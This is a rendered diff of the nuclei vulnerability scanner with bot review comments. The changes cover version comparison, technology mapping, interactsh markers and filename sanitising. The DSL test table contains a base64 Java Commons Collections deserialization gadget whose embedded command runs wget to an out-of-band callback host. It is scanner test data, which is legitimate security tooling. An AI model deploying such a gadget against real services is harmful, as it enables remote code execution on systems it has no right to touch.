gologger.Info().Msgf("Current nuclei-templates version: %s (%s)\n", configuration.TemplateVersion, configuration.TemplatesDirectory)
|
||||
os.Exit(0)
|
||||
}
|
||||
if options.StoreResponseDir != "" && !options.StoreResponse {
|
||||
gologger.Debug().Msgf("Store response directory specified, enabling \"str\" flag automatically\n")
|
||||
if options.StoreResponseDir != DefaultDumpTrafficOutputFolder && !options.StoreResponse {
|
||||
gologger.Debug().Msgf("Store response directory specified, enabling \"store-resp\" flag automatically\n")
|
||||
options.StoreResponse = true
|
||||
}
|
||||
// Validate the options passed by the user and if any
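Review bot: The new condition `options.StoreResponseDir != DefaultDumpTrafficOutputFolder && !options.StoreResponse` is also true when `StoreResponseDir` is the empty string, a case the previous `!= ""` check excluded. A caller that fills `types.Options` without going through the flag set's default (presumably a library embedding) would then have `StoreResponse` switched on, and request/response traffic, which can carry credentials and session headers, would be written to disk unasked. Keeping both guards avoids that: `if options.StoreResponseDir != "" && options.StoreResponseDir != DefaultDumpTrafficOutputFolder && !options.StoreResponse {`. An explicit `-srd output` is also indistinguishable from the default and will not enable storing, which is worth stating in the flag help. `ParseOptions` starts and ends outside the hunk.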
|
||||
|
|
|
@ -96,7 +96,7 @@ func (r *Runner) updateTemplates() error { // TODO this method does more than ju
|
|||
ctx := context.Background()
|
||||
|
||||
var noTemplatesFound bool
|
||||
if !fileutil.FileExists(r.templatesConfig.TemplatesDirectory) {
|
||||
if !fileutil.FolderExists(r.templatesConfig.TemplatesDirectory) {
|
||||
noTemplatesFound = true
|
||||
}
|
||||
|
||||
|
|
|
@ -27,7 +27,7 @@ type Config struct {
|
|||
const nucleiConfigFilename = ".templates-config.json"
|
||||
|
||||
// Version is the current version of nuclei
|
||||
const Version = `2.6.5`
|
||||
const Version = `2.6.6`
|
||||
|
||||
func getConfigDetails() (string, error) {
|
||||
configDir, err := GetConfigDir()
|
||||
|
|
|
@ -25,6 +25,7 @@ import (
|
|||
|
||||
"github.com/Knetic/govaluate"
|
||||
"github.com/asaskevich/govalidator"
|
||||
"github.com/hashicorp/go-version"
|
||||
"github.com/logrusorgru/aurora"
|
||||
"github.com/spaolacci/murmur3"
|
||||
|
||||
|
@ -447,6 +448,30 @@ func init() {
|
|||
return true, nil
|
||||
},
|
||||
),
|
||||
"compare_versions": makeDslWithOptionalArgsFunction(
|
||||
"(firstVersion, constraints ...string) bool",
|
||||
func(args ...interface{}) (interface{}, error) {
|
||||
if len(args) < 2 {
|
||||
return nil, invalidDslFunctionError
|
||||
}
|
||||
|
||||
firstParsed, parseErr := version.NewVersion(types.ToString(args[0]))
|
||||
if parseErr != nil {
|
||||
return nil, parseErr
|
||||
}
|
||||
|
||||
var versionConstraints []string
|
||||
for _, constraint := range args[1:] {
|
||||
versionConstraints = append(versionConstraints, types.ToString(constraint))
|
||||
}
|
||||
constraint, constraintErr := version.NewConstraint(strings.Join(versionConstraints, ","))
|
||||
if constraintErr != nil {
|
||||
return nil, constraintErr
|
||||
}
|
||||
result := constraint.Check(firstParsed)
|
||||
return result, nil
|
||||
},
|
||||
),
|
||||
"print_debug": makeDslWithOptionalArgsFunction(
|
||||
"(args ...interface{})",
|
||||
func(args ...interface{}) (interface{}, error) {
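Review bot: `compare_versions` hands the decision to `constraint.Check` from hashicorp/go-version, and as far as I know that library does not match a pre-release version against a constraint that has no pre-release part, so an expression like `compare_versions('2.4.0-rc1', '<2.4.1')` would evaluate to false. In a detection template that compares a version scraped from a response, that is a silent false negative, so the behaviour should be documented next to the function and pinned with a test case. The two error returns (`parseErr`, `constraintErr`) also reach the template author without naming the function or the offending argument; assuming `fmt` is in scope in this file, `return nil, fmt.Errorf("compare_versions: invalid version %q: %w", types.ToString(args[0]), parseErr)` would make them actionable. The enclosing `init` function starts and ends outside the hunk.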
|
||||
|
|
|
@ -108,6 +108,7 @@ func TestGetPrintableDslFunctionSignatures(t *testing.T) {
|
|||
expected := ` [93mbase64[0m(arg1 [38;5;208minterface{}[0m)[38;5;208m interface{}[0m
|
||||
[93mbase64_decode[0m(arg1 [38;5;208minterface{}[0m)[38;5;208m interface{}[0m
|
||||
[93mbase64_py[0m(arg1 [38;5;208minterface{}[0m)[38;5;208m interface{}[0m
|
||||
[93mcompare_versions[0m(firstVersion, constraints [38;5;208m...string[0m)[38;5;208m bool[0m
|
||||
[93mconcat[0m(args [38;5;208m...interface{}[0m)[38;5;208m string[0m
|
||||
[93mcontains[0m(arg1, arg2 [38;5;208minterface{}[0m)[38;5;208m interface{}[0m
|
||||
[93mdate[0m(arg1 [38;5;208minterface{}[0m)[38;5;208m interface{}[0m
|
||||
|
@ -209,16 +210,20 @@ func TestDslExpressions(t *testing.T) {
|
|||
`zlib_decode(hex_decode("789cf248cdc9c907040000ffff058c01f5"))`: "Hello",
|
||||
`gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))`: "Hello",
|
||||
`generate_java_gadget("commons-collections3.1", "wget https://{{interactsh-url}}", "base64")`: "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%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAAFc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AA3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh%2Bj/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AGwAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB%2BABtzcQB%2BABN1cQB%2BABgAAAACcHVxAH4AGAAAAAB0AAZpbnZva2V1cQB%2BABsAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAYc3EAfgATdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQAH3dnZXQgaHR0cHM6Ly97e2ludGVyYWN0c2gtdXJsfX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA==",
|
||||
`base64_decode("SGVsbG8=")`: "Hello",
|
||||
`hex_decode("6161")`: "aa",
|
||||
`len("Hello")`: float64(5),
|
||||
`len(1234)`: float64(4),
|
||||
`contains("Hello", "lo")`: true,
|
||||
`regex("H([a-z]+)o", "Hello")`: true,
|
||||
`wait_for(1)`: nil,
|
||||
`print_debug(1+2, "Hello")`: nil,
|
||||
`to_number('4')`: float64(4),
|
||||
`to_string(4)`: "4",
|
||||
`base64_decode("SGVsbG8=")`: "Hello",
|
||||
`hex_decode("6161")`: "aa",
|
||||
`len("Hello")`: float64(5),
|
||||
`len(1234)`: float64(4),
|
||||
`contains("Hello", "lo")`: true,
|
||||
`regex("H([a-z]+)o", "Hello")`: true,
|
||||
`wait_for(1)`: nil,
|
||||
`print_debug(1+2, "Hello")`: nil,
|
||||
`to_number('4')`: float64(4),
|
||||
`to_string(4)`: "4",
|
||||
`compare_versions('v1.0.0', '<1.1.1')`: true,
|
||||
`compare_versions('v1.1.1', '>v1.1.0')`: true,
|
||||
`compare_versions('v1.0.0', '>v0.0.1,<v1.0.1')`: true,
|
||||
`compare_versions('v1.0.0', '>v0.0.1', '<v1.0.1')`: true,
|
||||
}
|
||||
|
||||
for dslExpression, expectedResult := range dslExpressions {
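Review bot: All four added `compare_versions` cases expect `true`, so an implementation that always returned true would still pass them. Adding at least one unsatisfied constraint, such as `compare_versions('v1.0.0', '>v1.0.1')` with an expected value of `false`, would pin the comparison itself. The malformed-version and malformed-constraint error paths are not covered either and probably need a separate test, since this table appears to assert results only. `TestDslExpressions` continues outside the hunk.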
|
||||
|
|
|
@ -4,11 +4,14 @@ import (
|
|||
"io"
|
||||
"io/ioutil"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
|
||||
"github.com/corpix/uarand"
|
||||
"github.com/pkg/errors"
|
||||
"github.com/projectdiscovery/gologger"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/catalog/config"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/core"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/protocols"
|
||||
|
@ -17,6 +20,7 @@ import (
|
|||
"github.com/projectdiscovery/nuclei/v2/pkg/templates/types"
|
||||
"github.com/projectdiscovery/retryablehttp-go"
|
||||
wappalyzer "github.com/projectdiscovery/wappalyzergo"
|
||||
"gopkg.in/yaml.v2"
|
||||
)
|
||||
|
||||
// Service is a service for automatic automatic scan execution
|
||||
|
@ -29,8 +33,9 @@ type Service struct {
|
|||
childExecuter *core.ChildExecuter
|
||||
httpclient *retryablehttp.Client
|
||||
|
||||
results bool
|
||||
allTemplates []string
|
||||
results bool
|
||||
allTemplates []string
|
||||
technologyMappings map[string]string
|
||||
}
|
||||
|
||||
// Options contains configuration options for automatic scan service
|
||||
|
@ -41,6 +46,8 @@ type Options struct {
|
|||
Target core.InputProvider
|
||||
}
|
||||
|
||||
const mappingFilename = "wappalyzer-mapping.yml"
|
||||
|
||||
// New takes options and returns a new smart workflow service
|
||||
func New(opts Options) (*Service, error) {
|
||||
wappalyzer, err := wappalyzer.New()
|
||||
|
@ -48,6 +55,19 @@ func New(opts Options) (*Service, error) {
|
|||
return nil, err
|
||||
}
|
||||
|
||||
var mappingData map[string]string
|
||||
config, err := config.ReadConfiguration()
|
||||
if err == nil {
|
||||
mappingFile := filepath.Join(config.TemplatesDirectory, mappingFilename)
|
||||
if file, err := os.Open(mappingFile); err == nil {
|
||||
_ = yaml.NewDecoder(file).Decode(&mappingData)
|
||||
file.Close()
|
||||
}
|
||||
}
|
||||
if opts.ExecuterOpts.Options.Verbose {
|
||||
gologger.Verbose().Msgf("Normalized mapping (%d): %v\n", len(mappingData), mappingData)
|
||||
}
|
||||
|
||||
// Collect path for default directories we want to look for templates in
|
||||
var allTemplates []string
|
||||
for _, directory := range defaultTemplatesDirectories {
|
||||
|
@ -67,14 +87,15 @@ func New(opts Options) (*Service, error) {
|
|||
}
|
||||
|
||||
return &Service{
|
||||
opts: opts.ExecuterOpts,
|
||||
store: opts.Store,
|
||||
engine: opts.Engine,
|
||||
target: opts.Target,
|
||||
wappalyzer: wappalyzer,
|
||||
allTemplates: allTemplates,
|
||||
childExecuter: childExecuter,
|
||||
httpclient: httpclient,
|
||||
opts: opts.ExecuterOpts,
|
||||
store: opts.Store,
|
||||
engine: opts.Engine,
|
||||
target: opts.Target,
|
||||
wappalyzer: wappalyzer,
|
||||
allTemplates: allTemplates,
|
||||
childExecuter: childExecuter,
|
||||
httpclient: httpclient,
|
||||
technologyMappings: mappingData,
|
||||
}, nil
|
||||
}
|
||||
|
||||
|
@ -145,8 +166,25 @@ func (s *Service) processWappalyzerInputPair(input string) {
|
|||
resp.Body.Close()
|
||||
|
||||
fingerprints := s.wappalyzer.Fingerprint(resp.Header, data)
|
||||
items := make([]string, 0, len(fingerprints))
|
||||
normalized := make(map[string]struct{})
|
||||
for k := range fingerprints {
|
||||
normalized[strings.ToLower(k)] = struct{}{}
|
||||
}
|
||||
|
||||
if s.opts.Options.Verbose {
|
||||
gologger.Verbose().Msgf("Wappalyzer fingerprints %v for %s\n", normalized, input)
|
||||
}
|
||||
|
||||
for k := range normalized {
|
||||
// Replace values with mapping data
|
||||
if value, ok := s.technologyMappings[k]; ok {
|
||||
delete(normalized, k)
|
||||
normalized[value] = struct{}{}
|
||||
}
|
||||
}
|
||||
|
||||
items := make([]string, 0, len(normalized))
|
||||
for k := range normalized {
|
||||
if strings.Contains(k, " ") {
|
||||
parts := strings.Split(strings.ToLower(k), " ")
|
||||
items = append(items, parts...)
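Review bot: The decode error for the mapping file is discarded in New (`_ = yaml.NewDecoder(file).Decode(&mappingData)`), so a malformed or only partly valid wappalyzer-mapping.yml leaves the automatic scan running with an empty or partial mapping and no indication why. processWappalyzerInputPair uses this map to rewrite detected technology names before the items list is built, so a silent failure here would presumably surface only as reduced scan coverage. I would report it, for example `if err := yaml.NewDecoder(file).Decode(&mappingData); err != nil { gologger.Warning().Msgf("Could not decode %s: %s\n", mappingFile, err) }`. The errors from `config.ReadConfiguration()` and `os.Open` just above are dropped the same way. New's body starts and continues outside the hunks shown.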
|
|
@ -6,6 +6,7 @@ import (
|
|||
"encoding/hex"
|
||||
"fmt"
|
||||
"os"
|
||||
"regexp"
|
||||
"strings"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
|
@ -36,6 +37,8 @@ type Client struct {
|
|||
interactions *ccache.Cache
|
||||
// matchedTemplates is a stored cache to track matched templates
|
||||
matchedTemplates *ccache.Cache
|
||||
// interactshURLs is a stored cache to track track multiple interactsh markers
|
||||
interactshURLs *ccache.Cache
|
||||
|
||||
options *Options
|
||||
eviction time.Duration
|
||||
|
@ -50,7 +53,7 @@ type Client struct {
|
|||
|
||||
var (
|
||||
defaultInteractionDuration = 60 * time.Second
|
||||
interactshURLMarker = "{{interactsh-url}}"
|
||||
interactshURLMarkerRegex = regexp.MustCompile(`{{interactsh-url(?:_[0-9]+){0,3}}}`)
|
||||
)
|
||||
|
||||
// Options contains configuration options for interactsh nuclei integration.
|
||||
|
@ -104,11 +107,13 @@ func New(options *Options) (*Client, error) {
|
|||
interactionsCache := ccache.New(interactionsCfg)
|
||||
|
||||
matchedTemplateCache := ccache.New(ccache.Configure().MaxSize(defaultMaxInteractionsCount))
|
||||
interactshURLCache := ccache.New(ccache.Configure().MaxSize(defaultMaxInteractionsCount))
|
||||
|
||||
interactClient := &Client{
|
||||
eviction: options.Eviction,
|
||||
interactions: interactionsCache,
|
||||
matchedTemplates: matchedTemplateCache,
|
||||
interactshURLs: interactshURLCache,
|
||||
options: options,
|
||||
requests: cache,
|
||||
pollDuration: options.PollDuration,
|
||||
|
@ -254,10 +259,18 @@ func (c *Client) Close() bool {
|
|||
// It accepts data to replace as well as the URL to replace placeholders
|
||||
// with generated uniquely for each request.
|
||||
func (c *Client) ReplaceMarkers(data string, interactshURLs []string) (string, []string) {
|
||||
for strings.Contains(data, interactshURLMarker) {
|
||||
for interactshURLMarkerRegex.Match([]byte(data)) {
|
||||
url := c.URL()
|
||||
interactshURLs = append(interactshURLs, url)
|
||||
data = strings.Replace(data, interactshURLMarker, url, 1)
|
||||
interactshURLMarker := interactshURLMarkerRegex.FindString(data)
|
||||
if interactshURLMarker != "" {
|
||||
data = strings.Replace(data, interactshURLMarker, url, 1)
|
||||
urlIndex := strings.Index(url, ".")
|
||||
if urlIndex == -1 {
|
||||
continue
|
||||
}
|
||||
c.interactshURLs.Set(url, interactshURLMarker, defaultInteractionDuration)
|
||||
}
|
||||
}
|
||||
return data, interactshURLs
|
||||
}
|
||||
|
@ -265,14 +278,21 @@ func (c *Client) ReplaceMarkers(data string, interactshURLs []string) (string, [
|
|||
// MakePlaceholders does placeholders for interact URLs and other data to a map
|
||||
func (c *Client) MakePlaceholders(urls []string, data map[string]interface{}) {
|
||||
data["interactsh-server"] = c.hostname
|
||||
for _, url := range urls {
|
||||
if interactshURLMarker := c.interactshURLs.Get(url); interactshURLMarker != nil {
|
||||
if interactshURLMarker, ok := interactshURLMarker.Value().(string); ok {
|
||||
interactshMarker := strings.TrimSuffix(strings.TrimPrefix(interactshURLMarker, "{{"), "}}")
|
||||
|
||||
if len(urls) == 1 {
|
||||
urlIndex := strings.Index(urls[0], ".")
|
||||
if urlIndex == -1 {
|
||||
return
|
||||
c.interactshURLs.Delete(url)
|
||||
|
||||
data[interactshMarker] = url
|
||||
urlIndex := strings.Index(url, ".")
|
||||
if urlIndex == -1 {
|
||||
continue
|
||||
}
|
||||
data[strings.Replace(interactshMarker, "url", "id", 1)] = url[:urlIndex]
|
||||
}
|
||||
}
|
||||
data["interactsh-url"] = urls[0]
|
||||
data["interactsh-id"] = urls[0][:urlIndex]
|
||||
}
|
||||
}
|
||||
|
||||
|
@ -355,7 +375,7 @@ func HasMatchers(op *operators.Operators) bool {
|
|||
|
||||
// HasMarkers checks if the text contains interactsh markers
|
||||
func HasMarkers(data string) bool {
|
||||
return strings.Contains(data, interactshURLMarker)
|
||||
return interactshURLMarkerRegex.Match([]byte(data))
|
||||
}
|
||||
|
||||
func (c *Client) debugPrintInteraction(interaction *server.Interaction, event *operators.Result) {
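Review bot: MakePlaceholders now sets a placeholder only when `c.interactshURLs.Get(url)` returns an entry, and a miss is skipped without any trace. A miss looks possible: the cache is size-bounded (`MaxSize(defaultMaxInteractionsCount)`), and ReplaceMarkers skips the `Set` on its `continue` path after the marker has already been replaced. The single-URL fallback that set `interactsh-url` and `interactsh-id` appears to have been removed (the rendering does not mark old and new lines). On a miss the interactsh keys would then presumably stay out of `data`, and an out-of-band interaction for that request would not be correlated, which is a silent false negative. I would add an explicit branch for the nil result that at least logs the URL, or keep the plain `data["interactsh-url"] = url` fallback.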
|
||||
|
|
|
@ -9,6 +9,7 @@ import (
|
|||
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/output"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/reporting/format"
|
||||
"github.com/projectdiscovery/stringsutil"
|
||||
)
|
||||
|
||||
type Exporter struct {
|
||||
|
@ -78,5 +79,5 @@ func sanitizeFilename(filename string) string {
|
|||
if len(filename) > 256 {
|
||||
filename = filename[0:255]
|
||||
}
|
||||
return filename
|
||||
return stringsutil.ReplaceAny(filename, "_", "?", "/", ">", "|", ":", ";", "*", "<", "\"", "'", " ")
|
||||
}
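Review bot: The character list passed to `stringsutil.ReplaceAny` in sanitizeFilename covers `/` but not the backslash, and it leaves `.` alone. On Windows a name containing `\` may therefore still be read as a path separator, and a name of `..` passes through unchanged, unless the part of the function above the hunk already handles this. If the input can come from scan targets or template data, it should not be able to steer where the report file is written. Adding `"\\"` to the list closes the separator case: `return stringsutil.ReplaceAny(filename, "_", "?", "/", "\\", ">", "|", ":", ";", "*", "<", "\"", "'", " ")`. The context lines also truncate by bytes (`filename[0:255]`), which can split a multi-byte character; sanitizeFilename starts outside the hunk.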
|
||||
|
|
|
@ -93,6 +93,21 @@ func RunNucleiBinaryAndGetLoadedTemplates(nucleiBinary string, debug bool, args
|
|||
}
|
||||
return matches[0][1], nil
|
||||
}
|
||||
func RunNucleiBinaryAndGetCombinedOutput(debug bool, args []string) (string, error) {
|
||||
cmd := exec.Command("./nuclei", args...)
|
||||
if debug {
|
||||
cmd.Args = append(cmd.Args, "-debug")
|
||||
fmt.Println(cmd.String())
|
||||
}
|
||||
data, err := cmd.CombinedOutput()
|
||||
if debug {
|
||||
fmt.Println(string(data))
|
||||
}
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
return string(data), nil
|
||||
}
|
||||
|
||||
// TestCase is a single integration test case
|
||||
type TestCase interface {
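Review bot: RunNucleiBinaryAndGetCombinedOutput hard-codes `./nuclei`, while the sibling helper named in the hunk header, RunNucleiBinaryAndGetLoadedTemplates, takes the binary as its `nucleiBinary` parameter. The relative path is resolved against the current working directory, so the two helpers can end up exercising different binaries. On failure it returns `""` and drops the captured output, which hides the reason unless `debug` is set; `return string(data), err` keeps it. The function is exported without a doc comment; I would add `// RunNucleiBinaryAndGetCombinedOutput runs ./nuclei with args and returns its combined stdout and stderr.`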
|
||||
|
|